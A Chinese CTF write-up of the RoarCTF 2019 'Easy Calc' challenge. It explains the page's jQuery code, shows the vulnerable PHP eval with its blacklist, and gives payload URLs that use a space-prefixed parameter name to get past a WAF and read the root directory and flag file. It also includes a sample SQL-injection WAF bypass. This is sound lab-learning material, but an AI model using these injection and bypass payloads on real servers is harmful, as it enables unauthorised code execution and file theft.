当前位置: 首页 > news >正文

BUU17 [RoarCTF 2019]Easy Calc1

news 2025/7/7 13:34:31

自用

源代码

$('#calc').submit(function(){$.ajax({url:"calc.php?num="+encodeURIComponent($("#content").val()),type:'GET',success:function(data){$("#result").html(`<div class="alert alert-success"><strong>答案:</strong>${data}</div>`);},error:function(){alert("这啥?算不来!");}})return false;})

代码解释

代码语言涉及: jQuery,AJAX

表单提交事件绑定

$('#calc').submit(function(){// ...return false;
});
  • $('#calc'):使用 jQuery 选择器选中 ID 为 calc 的表单元素。
  • .submit():为表单元素绑定提交事件,当表单提交时会触发传入的回调函数。
  • return false;:阻止表单的默认提交行为,防止页面刷新。

  AJAX 请求

$.ajax({url: "calc.php?num=" + encodeURIComponent($("#content").val()),type: 'GET',success: function(data) {// ...},error: function() {// ...}
});
  1. $.ajax():jQuery 提供的用于发起 AJAX 请求的函数,接受一个配置对象作为参数。
  2. url:请求的 URL,这里将 ID 为 content 的输入框中的值进行编码后作为 num 参数添加到 calc.php 的 URL 后面。encodeURIComponent() 函数用于对特殊字符进行编码,确保参数传递的正确性。
  3. type:请求的类型,这里使用 GET 请求。
  4. success:请求成功时的回调函数,data 参数表示服务器返回的数据。
  5. error:请求失败时的回调函数。

成功回调函数 

success: function(data) {$("#result").html(`<div class="alert alert-success"><strong>答案:</strong>${data}</div>`);
}
  • $("#result"):使用 jQuery 选择器选中 ID 为 result 的元素。
  • .html():将指定的 HTML 内容插入到选中元素中。这里使用了模板字符串(ES6 特性)将服务器返回的结果 data 插入到一个带有 alert alert-success 类的 div 元素中

错误回调函数  

error: function() {alert("这啥?算不来!");
}

做法

看见源代码中有calc.php,访问得到源码

<?php
error_reporting(0);
if(!isset($_GET['num'])){show_source(__FILE__);
}else{$str = $_GET['num'];$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];foreach ($blacklist as $blackitem) {if (preg_match('/' . $blackitem . '/m', $str)) {die("what are you want to do?");}}eval('echo '.$str.';');
}
?>

用system()或者exec()执行?

不行--在 phpinfo 中可以发现 system、exec 这一类命令执行的函数被禁用了

我们知道PHP将查询字符串(在URL或正文中)转换为内部$_GET或的关联数组$_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id] => 42)。如果一个IDS/IPS或WAF中有一条规则是当news_id参数的值是一个非数字的值则拦截,那么我们就可以用以下语句绕过:

/news.php?%20news[id%00=42"+AND+1=0–

上述PHP语句的参数%20news[id%00的值将存储到$_GET[“news_id”]中。

HP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:

1.删除空白符

2.将某些字符转换为下划线(包括空格)

 显示用var_dump()或print_r(),当前目录用scandir(),屏蔽/可用chr(47)代替,查看文件用file_get_content()highlight_file()

http://node5.buuoj.cn:25688/calc.php/calc.php/?%20num=print_r(scandir(chr(47)))

发现f1agg文件

查看文件用file_get_content()或者highlight_file()

http://node5.buuoj.cn:25688/calc.php/calc.php/?%20num=print_r(file_get_contents(chr(47).f1agg))

 参考文章:[RoarCTF 2019]Easy Calc_[roarctf 2019]easy calc 1-CSDN博客

利用PHP的字符串解析特性Bypass - FreeBuf网络安全行业门户

【BUUCTF】[RoarCTF 2019]Easy Calc1_[roarctf 2019]easy calc 1-CSDN博客

http://www.lryc.cn/news/531376.html

相关文章:

  • 堆的实现——对的应用(堆排序)
  • 新生讲课——图和并查集
  • 基于深度学习的视觉检测小项目(十七) 用户管理后台的编程
  • 实战:利用百度站长平台加速网站收录
  • web-XSS-CTFHub
  • 【C++】P1957 口算练习题
  • 第二十三章 MySQL锁之表锁
  • linux 进程补充
  • 渗透测试之文件包含漏洞 超详细的文件包含漏洞文章
  • Java 大视界 -- Java 大数据在智能医疗影像诊断中的应用(72)
  • Web - CSS3浮动定位与背景样式
  • ConcurrentHashMap线程安全:分段锁 到 synchronized + CAS
  • 系统学习算法:专题九 穷举vs暴搜vs深搜vs回溯vs剪枝
  • 解决 Pandas DataFrame 索引错误:KeyError:0
  • deepseek的对话风格
  • 制造业设备状态监控与生产优化实战:基于SQL的序列分析与状态机建模
  • Javaweb学习之Mysql(Day5)
  • C++ Primer 迭代器
  • Java的String与StringBuilder例题
  • Vue.js 如何选择合适的组件库
  • github下载失败网页打开失败 若你已经知道github地址如何cmd下载
  • 排序算法--计数排序
  • [特殊字符]const在函数前后的作用详解(附经典案例)
  • 【字节青训营-7】:初探 Kitex 字节微服务框架(使用ETCD进行服务注册与发现)
  • 给AI用工具的能力——Agent
  • Jupyter Lab的使用
  • 【从零开始的LeetCode-算法】922. 按奇偶排序数组 II
  • RabbitMQ深度探索:前置知识
  • 『 C++ 』中不可重写虚函数的实用案例
  • Redis - String相关命令